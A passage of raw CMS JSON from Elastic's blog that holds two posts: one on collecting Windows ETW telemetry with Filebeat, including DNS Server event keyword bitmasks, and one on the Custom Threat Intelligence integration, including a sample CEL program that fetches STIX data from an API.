12pt;\"\u003eThe Filebeat ETW input offers filtering options that allow you to capture only relevant events from a specific provider:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cstrong\u003ematch_any_keyword:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e Captures events if they match any one of the specified keywords. This is useful when you want to monitor a range of event types that don’t necessarily occur together.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cstrong\u003ematch_all_keyword: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eCaptures events only if they match all specified keywords. This option is ideal for highly specific event monitoring where events must meet multiple criteria simultaneously.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cstrong\u003etrace_level:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e Filters events based on their severity level, allowing you to specify whether to capture only errors, warnings, or informational messages. This can help to focus monitoring efforts on high-priority issues.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThe output from \u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cem\u003elogman\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e lists various event types with corresponding keywords, allowing you to select specific events to monitor. For example, if you want to track recursive queries, you might look for keywords like RECURSE_QUERY_OUT, RECURSE_RESPONSE_IN, or RECURSE_QUERY_DROP. To filter specifically for these recursive query events, you would calculate the bitmask sum of their values:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e1. Identify the hex values for each keyword:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eRECURSE_QUERY_OUT: 0x0000000000000010\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eRECURSE_RESPONSE_IN: 0x0000000000000020\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eRECURSE_QUERY_DROP: 0x0000000000000040\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eMicrosoft-Windows-DNSServer/Analytical (to ensure Analytical events are captured): 0x8000000000000000\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e2. Add these values together:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e0x8000000000000000 + 0x0000000000000010 + 0x0000000000000020 + 0x0000000000000040 = 0x8000000000000070\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThis resulting bitmask, 0x8000000000000070, would be used in the match_any_keyword configuration to capture only these specific recursive query events.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThis approach allows for granular control over the data the ETW input ingests, ensuring you collect only events that are relevant to your monitoring needs.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Introducing ETW-based integrations","_metadata":{"uid":"cs5e973c5297a7e6f8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eBeyond the Filebeat ETW input, we’re also introducing two integrations that simplify ETW data collection for specific use cases.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Microsoft DNS Server integration","_metadata":{"uid":"cs89ede9e507672436"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eMonitoring DNS server analytical logs is essential for maintaining the security and performance of network infrastructure. Common types of DNS attacks — DNS hijacking, DNS tunneling, various denial-of-service (DoS) attacks, and DNS cache poisoning — mean significant risks to organizations. Windows DNS analytical logging is a vital event source that administrators and security analysts require visibility into. It provides detailed insights into every DNS transaction occurring both internally and externally on a network.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThe \u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/integrations/microsoft_dnsserver\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMicrosoft DNS Server\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e integration focuses specifically on gathering DNS server Audit and Analytical logs. With this integration, organizations can easily track and analyze DNS queries, responses, and error rates — facilitating a deeper understanding of DNS activity. The prebuilt dashboards included in the integration allow users to dive into DNS activity analysis without the need for complex configuration or extensive setup.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csda544f793ba59cbe"}}},{"image":{"image":{"uid":"blt67e68da247a78f4b","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-18T04:26:14.622Z","created_by":"bltb6c155cd84fc0c1a","file_size":"230415","filename":"image1.png","parent_uid":null,"tags":[],"title":"image1.png","updated_at":"2024-11-18T04:26:14.622Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-20T14:00:01.051Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt67e68da247a78f4b/673ac1e6858194c9660e0345/image1.png"},"_metadata":{"uid":"csa85a4a4ed21f9b50"},"caption_l10n":"Microsoft DNS Server analytics dashboard","alt_text_l10n":"Microsoft DNS Server analytics dashboard","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Custom ETW integration","_metadata":{"uid":"csba8177d9f962ed30"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThe \u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/integrations/windows_etw\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecustom ETW\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e integration enables users to ingest ETW events into Elastic, offering the flexibility to configure the integration with any compatible provider or to read from prerecorded .etl files.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThis adaptability allows users to capture provider-specific data — application logs, system performance metrics, or historical event data — tailored to their monitoring needs.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Try the ETW input","_metadata":{"uid":"csf3468e873c99854c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThe new ETW input in Elastic reveals powerful possibilities for monitoring and securing Windows environments. Users can now collect detailed telemetry from Windows applications and services that rely on ETW, allowing for real-time insights into system performance, application behavior, and potential security risks.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThis capability is complemented by built-in integrations, such as the Microsoft DNS Server integration, that make it simple to gain immediate, actionable insights without complex setup.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eThese new features are just the beginning of what ETW can bring to Elastic users. We’re excited for you to try out these features, explore new use cases, and share your feedback to help us continue evolving ETW capabilities within Elastic. To get started, visit the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-etw.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eETW input\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e page for setup instructions, or explore these features with a free trial on \u003c/span\u003e\u003ca href=\"https://www.elastic.co/cloud/cloud-trial-overview\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs644b9c211faaac00"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs8f57cbef9a92105e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8920f42564fb5276"}}}],"publish_date":"2024-11-20","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt39140cf3e2cd4550","ACL":{},"created_at":"2023-11-06T21:51:00.583Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"integrations","label_l10n":"Integrations","tags":[],"title":"Integrations","updated_at":"2023-11-06T21:51:00.583Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.083Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data ingestion","tags":[],"title":"Data ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}},{"title":"Getting started","label_l10n":"Getting started","keyword":"getting-started","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt30953f4176054d3f","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:25.148Z","updated_at":"2020-06-17T03:37:25.148Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:25.148Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-07T18:03:25.028Z","user":"blt36e890d06c5ec32c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc8e4f4eb4eed3ccd","ACL":{},"created_at":"2023-11-06T21:42:18.209Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"infrastructure-monitoring","label_l10n":"Infrastructure monitoring","tags":[],"title":"Infrastructure monitoring","updated_at":"2023-11-06T21:42:18.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.160Z","user":"blt4b2e1169881270a8"}},{"title":"Ingesting","label_l10n":"Ingesting","keyword":"ingesting","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt886805f7b26ef356","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:37:57.513Z","updated_at":"2020-06-17T03:37:57.513Z","_content_type_uid":"tags_topic","ACL":{},"_version":1,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:37:57.513Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-06-29T17:20:06.688Z","user":"bltea6cbb86fea188be"}},{"_content_type_uid":"tags_topic","uid":"bltf38f037a2b6ecb4e","title":"Log monitoring","label_l10n":"Log monitoring","keyword":"log-monitoring","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:29:28.882Z","updated_at":"2023-11-06T21:29:28.882Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.371Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"tags_topic","uid":"blt4a47bf681100e8ca","title":"Log management","label_l10n":"Log management","keyword":"log-management","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:42:23.694Z","updated_at":"2023-11-06T20:42:23.694Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.358Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt5035b0f93483b762","ACL":{},"created_at":"2023-11-06T20:43:32.204Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"network-visibility","label_l10n":"Network visibility","tags":[],"title":"Network visibility","updated_at":"2023-11-06T20:43:32.204Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:55.573Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"blt6523d1915a049081","ACL":{},"created_at":"2022-09-13T16:43:25.630Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"beats","label_l10n":"Beats","tags":[],"title":"Beats","updated_at":"2022-09-13T16:43:25.630Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.245Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt1da4f3003d84005b","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-18T04:16:43.087Z","created_by":"bltb6c155cd84fc0c1a","file_size":"142407","filename":"158175_-_Blog_header_image_Prancheta_1-02_(1).jpg","parent_uid":null,"tags":[],"title":"158175 - Blog header image_Prancheta 1-02 (1).jpg","updated_at":"2024-11-18T04:16:43.087Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-20T14:00:01.036Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1da4f3003d84005b/673abfab3c3ebb30501412b7/158175_-_Blog_header_image_Prancheta_1-02_(1).jpg"},"title":"Collecting Windows telemetry with Elastic: An introduction to the ETW Filebeat input","title_l10n":"Collecting Windows telemetry with Elastic: An introduction to the ETW Filebeat input","updated_at":"2024-11-18T04:35:49.333Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/windows-telemetry-etw-filebeat-input","publish_details":{"time":"2024-11-20T14:00:00.991Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt99ff8bce71ba4bd1","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"The Custom Threat Intelligence integration allows security teams to bring in threat data from multiple sources converting it into ECS. By ingesting threat intelligence, users can enhance security visibility within the Elastic Search AI Platform.","author":["blt20e8c49509353c7a"],"category":["bltb79594af7c5b4199"],"created_at":"2024-11-18T03:54:39.994Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs82f16fe225d0ce8e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eIn modern cybersecurity, organizations must be prepared to handle a wide variety of threat intelligence data to stay ahead of emerging threats. To support this need, Elastic introduces the\u003c/span\u003e\u003ca href=\"https://www.elastic.co/docs/current/integrations/ti_custom\"\u003e\u003cspan style='font-size: 12pt;'\u003e Custom Threat Intelligence integration\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e, specifically designed for ingesting indicators of compromise (IoCs) in the STIX 2.1 format. By \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security-labs/stixy-situations-ecsaping-your-threat-data\"\u003e\u003cspan style='font-size: 12pt;'\u003econverting\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e STIX data into the Elastic Common Schema (ECS), this integration makes it simple to bring threat data from diverse sources directly into Elastic for unified analysis and detection workflows.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eThis integration gives users the flexibility to gather threat intelligence from a range of sources, such as STIX-compliant APIs, TAXII 2.1 servers, and even log files in air-gapped environments.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Key features of the Custom Threat Intelligence integration","_metadata":{"uid":"csb531bd9507a20555"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eThe Custom Threat Intelligence integration is built for ingesting and converting STIX data into ECS, allowing users to merge threat intelligence from various external sources into Elastic effortlessly. Below are the integration’s core features:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e\u003cstrong\u003eConversion of STIX indicators to ECS:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e The integration is designed to ingest STIX 2.1 format data, converting each indicator into ECS-compatible fields. A default pipeline handles common STIX data mappings automatically, but users can extend functionality by adding custom pipelines for unique STIX indicators or formats as needed.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e\u003cstrong\u003eCEL input for API communication:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e The integration uses the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eCommon Expression Language (CEL) input\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e to enable flexible communication with STIX APIs. Through CEL programs, the integration can connect to STIX-compliant APIs and retrieve relevant threat intelligence data. This approach allows for highly customizable data ingestion, handling HTTP requests, responses, and data processing in a structured way.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e\u003cstrong\u003eBuilt-in TAXII 2.1 client for simplified data retrieval:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e For organizations relying on TAXII servers, the integration includes a built-in CEL program that acts as a TAXII 2.1 client. This client facilitates connections to TAXII 2.x servers, automatically retrieving STIX data with minimal configuration — just the TAXII server URL and any required authentication credentials.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e\u003cstrong\u003eLog file support for air-gapped environments:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e Recognizing the needs for air-gapped environments, the integration also supports reading STIX-based threat intelligence from log files. This enables organizations in isolated environments to incorporate threat intelligence without requiring direct internet access.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e\u003cstrong\u003eBuilt-in dashboard for visualizing indicators:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003e The integration comes with a built-in dashboard to visualize ingested threat intelligence indicators, making it easy for users to view and interpret the threat data collected. This dashboard provides an organized view of indicators, helping analysts quickly assess threat intelligence patterns and enhance awareness.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csc980060f96335bb7"}}},{"image":{"image":{"uid":"blte8d009e546f997ef","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-18T03:49:32.029Z","created_by":"bltb6c155cd84fc0c1a","file_size":"369074","filename":"image2.png","parent_uid":null,"tags":[],"title":"image2.png","updated_at":"2024-11-18T03:49:32.029Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-19T14:00:00.392Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte8d009e546f997ef/673ab94c9123c2ec790a412b/image2.png"},"_metadata":{"uid":"cs3b664c729eb72c5a"},"caption_l10n":"Custom Threat Intelligence dashboard: IoCs overview","alt_text_l10n":"Custom Threat Intelligence dashboard: IoCs overview","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Use case: Understanding a CEL program for custom API ingestion","_metadata":{"uid":"cs9c20605402fa1caf"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eFor STIX APIs that do not follow a specific protocol like TAXII, CEL programs allow you to customize the retrieval and processing of threat data. Using CEL, you can define HTTP headers, query parameters, pagination, and payload processing to meet the requirements of the API — ensuring accurate and complete ingestion of threat intelligence.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(14, 14, 14);font-size: 12pt;'\u003eTo show how CEL programs work within the Custom Threat Intelligence integration, let’s break down a sample CEL program. This example shows how a CEL program can be used to retrieve data from a custom STIX API using the GET method and incorporates flexible authentication options based on the presence of an API key or Basic Authentication credentials.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse34cd9021e5cf51e"}}},{"code":{"code":"state.with(\n request(\n \"GET\",\n (has(state.initial_interval) \u0026\u0026 state.initial_interval != \"\") ?\n (\n state.url.trim_right(\"/\") + \"?\" + {\n \"start\": [(now() - duration(state.initial_interval)).format(time_layout.RFC3339)],\n }.format_query()\n )\n :\n state.url\n ).with(\n {\n \"Header\": {\n \"Authorization\": (has(state.api_key) \u0026\u0026 state.api_key != \"\") ?\n [\"Bearer \" + string(state.api_key)]\n : (state.?username.orValue(\"\") != \"\" \u0026\u0026 state.?password.orValue(\"\") != \"\") ?\n [\"Basic \" + (state.username + \":\" + state.password).base64()]\n :\n []\n }\n }\n ).do_request().as(resp, (resp.StatusCode == 200) ?\n bytes(resp.Body).decode_json().as(body,\n {\n \"events\": body.objects.map(e,\n {\n \"message\": e.encode_json(),\n }\n ),\n \"url\": state.url,\n \"api_key\": state.?api_key.orValue(\"\"),\n \"username\": state.?username.orValue(\"\"),\n \"password\": state.?password.orValue(\"\"),\n }\n )\n :\n {\n \"events\": {\n \"error\": {\n \"code\": string(resp.StatusCode),\n \"id\": string(resp.Status),\n \"message\": \"GET:\" +\n (\n (size(resp.Body) != 0) ?\n string(resp.Body)\n :\n string(resp.Status) + \" (\" + string(resp.StatusCode) + \")\"\n ),\n },\n }\n }\n )\n)","_metadata":{"uid":"cs77ef38b056601dad"}}},{"title_text":{"title_text":[{"title_l10n":"Breaking down the CEL program","_metadata":{"uid":"csca0b2e7dee2cf8b9"},"header_style":"H3","paragraph_l10n":"\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cstrong\u003eRequest construction:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e The CEL program constructs an HTTP GET request. If the \u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cem\u003einitial_interval\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e is set, the request URL appends a query parameter specifying the start time — which is calculated from the current time minus the initial interval. This allows the integration to fetch only recent threat data.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cstrong\u003eHeader setup:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e The program dynamically builds the Authorization header to support different types of authentication:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eIf an \u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cem\u003eapi_key\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e is provided, it creates a Bearer token using \u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cem\u003eAuthorization: Bearer \u0026lt;api_key\u0026gt;\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eIf the API requires Basic Authentication instead, it checks for \u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cem\u003eusername\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e and \u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cem\u003epassword\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e fields, encoding them in base64 as required by the Basic \u0026lt;encoded_credentials\u0026gt; format.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eIf neither an API key nor username and password are available, the Authorization header is left empty.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cstrong\u003eData processing on successful response:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e If the response status is 200 (OK), the program decodes the JSON body of the response and maps each STIX object as an event in Elastic.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e\u003cstrong\u003eError handling:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e If the response status is not 200, the program generates an error event that includes the status code, response status, and any response body content. This error handling provides visibility into any issues with data retrieval.\u003c/span\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"CEL initial state","_metadata":{"uid":"cs8d4f3ca42c97d8f1"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003eEach CEL program requires an \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#input-state-cel\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003einitial state\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(14, 14, 14);font-size: 12pt;\"\u003e definition — which includes key parameters, such as the API URL, authentication tokens, and 